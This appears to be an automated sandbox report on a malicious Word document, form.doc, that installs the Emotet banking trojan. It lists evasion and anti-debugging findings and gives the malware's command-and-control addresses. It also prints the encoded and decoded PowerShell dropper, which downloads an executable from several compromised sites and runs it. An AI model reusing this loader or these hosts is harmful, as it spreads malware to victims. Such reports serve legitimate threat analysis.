Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\UXInit\UXInit.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\317.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\UXInit\UXInit.exeWindow / User API: threadDelayed 782
Found evasive API chain (date check)Show sources
Source: C:\Users\user\317.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\317.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\317.exeAPI coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2432Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\317.exe TID: 2544Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep count: 782 > 30
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep time: -46920000s >= -30000s
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep time: -60000s >= -30000s
Checks the free space of harddrivesShow sources
Source: C:\Users\user\317.exeFile Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\317.exeCode function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,
Source: C:\Users\user\317.exeCode function: 3_2_0042FC18 lstrlen,FindFirstFileA,FindClose,
Source: C:\Users\user\317.exeCode function: 3_2_002130C0 FindNextFileW,FindFirstFileW,FindClose,
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Program exit pointsShow sources
Source: C:\Users\user\317.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\317.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\317.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
Contains functionality to read the PEBShow sources
Source: C:\Users\user\317.exeCode function: 3_2_00403040 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00200467 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00202F7F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00203D1F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_002143E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00213640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00203D1F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00200467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00202F7F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00213640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_002143E0 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\317.exeCode function: 3_2_00444764 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\317.exeCode function: 3_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\317.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\317.exeCode function: 3_2_00444786 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\317.exeCode function: 3_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: form.docOLE indicator, VBA stomping: true
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Rombwbocgphaf='Qkydsgerjjf';$Rqkmqaplw = '317';$Mmfffaitlhs='Osjqfeakfmsl';$Rxgnducw=$env:userprofile+'\'+$Rqkmqaplw+'.exe';$Xcsqtxmucbu='Hwyqkempy';$Zarnnblwvtim=.('n'+'ew'+'-object') nEt.webClIENT;$Izmwxbyucz='http://sportnal.azurewebsites.net/calendar/Xzoo/*http://teeo.highoninfo.com/wp-admin/1tx/*http://thebluebearyhillproject.com/wp-admin/q07/*http://themefolks.com/trendzbd/oaGZCVsJ/*http://techotechsolution.com/wp-admin/W8m6/'."s`plit"([char]42);$Adpfhznuomlr='Zqgupivfwto';foreach($Apuhqbxb in $Izmwxbyucz){try{$Zarnnblwvtim."d`ownloadF`ILe"($Apuhqbxb, $Rxgnducw);$Hhexydzqqhgmd='Luwfealn';If ((.('Get-'+'It'+'em') $Rxgnducw)."L`eNgtH" -ge 24611) {([wmiclass]'win32_Process')."CREA`Te"($Rxgnducw);$Rxugwradgn='Mnuaijzhmtv';break;$Xibvvtyc='Cwjlomzhmb'}}catch{}}$Rkacegnwxb='Yjyhlulmx'
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\317.exeProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIAeAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Progman
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\317.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\317.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,
Source: C:\Users\user\317.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Users\user\317.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Users\user\317.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
Source: C:\Users\user\317.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_00455551 cpuid
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\317.exeCode function: 3_2_004475B7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\317.exeCode function: 3_2_0044F600 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
Contains functionality to query windows versionShow sources
Source: C:\Users\user\317.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\317.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000003.00000002.998731438.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382927198.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.995611411.00200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382911202.00200000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0040EE65 CreateBindCtx,CoTaskMemFree,
Source: C:\Users\user\317.exeCode function: 3_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,

Malware Configuration

Threatname: Emotet

{"C2 list": ["04.236.28.47:8080", "104.236.28.47/ch6aFjXP", "104.236.28.47:8080", "98.239.119.52/VgwZzucbO28XwD"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
20:13:28API Interceptor46x Sleep call for process: powershell.exe modified
20:13:36API Interceptor32x Sleep call for process: 317.exe modified
20:13:47API Interceptor1680x Sleep call for process: UXInit.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
form.doc63%VirustotalBrowse
form.doc55%ReversingLabs TitaniumCloud FileReputationDocument-Word.Trojan.Snh
form.doc100%AviraVBA/Dldr.Agent.erhlk
form.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
teeo.highoninfo.com1%VirustotalBrowse
thebluebearyhillproject.com10%VirustotalBrowse
waws-prod-sn1-081.cloudapp.net0%VirustotalBrowse
sportnal.azurewebsites.net4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://sportnal.azurewebsites.net/calendar/Xzoo/11%VirustotalBrowse
http://sportnal.azurewebsites.net/calendar/Xzoo/0%Avira URL Cloudsafe
http://thebluebearyhillproject.com/wp-admin/q07/17%VirustotalBrowse
http://thebluebearyhillproject.com/wp-admin/q07/100%Avira URL Cloudmalware
http://98.239.119.52/VgwZzucbO28XwD/OLIsQLqeqyzclLWVv/dDqe/wmOuSU/6FaQefiFlRcfZlz/0%Avira URL Cloudsafe
http://teeo.highoninfo.com/wp-admin/1tx/10%VirustotalBrowse
http://teeo.highoninfo.com/wp-admin/1tx/0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.998731438.00211000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.1382927198.00211000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000002.995611411.00200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.1382911202.00200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

          Unpacked PEs

          No yara matches

          Sigma Overview

          No Sigma rule has matched

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          98.239.119.52http://smarktestllc.com/smarktestllc.com/95904/h19377590014459994sm8a4ndcimtsefGet hashmaliciousBrowse
          • 98.239.119.52/4bV9XHDISanGEAB3XJ/
          13.85.72.129http://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/Get hashmaliciousBrowse
          • sportnal.azurewebsites.net/calendar/Xzoo/
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • sportnal.azurewebsites.net/calendar/Xzoo/
          http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/Get hashmaliciousBrowse
          • sportnal.azurewebsites.net/calendar/Xzoo/
          http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/Get hashmaliciousBrowse
          • sportnal.azurewebsites.net/calendar/Xzoo/
          104.236.28.47FMANe21F1Afxd4jr1iZv.exeGet hashmaliciousBrowse
          • 104.236.28.47:8080/hsEe/YICxVEoN3pMBsmB/Bbf0AkvejSx/8qsGhyEfBUjgg/Gpdqq9a3ABnTAN/
          https://printmygame.com/wp-content/MV2VSF1FH61/eyeuxn/Get hashmaliciousBrowse
          • 104.236.28.47:8080/yohRBUJ/UJNjfPq7mCx/GIB4nD/4ymPh/
          5167-31632_County_Report.rtfGet hashmaliciousBrowse
          • 104.236.28.47:8080/qTOCLk7eJB0N7wSkI/airGiD5hVE0vdcJ/
          http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/Get hashmaliciousBrowse
          • 104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/
          http://www.wireup.in/oeiwosk36j3ss/INC/79wn96/xlhdd049999796-5498-mpnvitjpw5jhd/Get hashmaliciousBrowse
          • 104.236.28.47:8080/bKi1vowZfe5zkey0tB
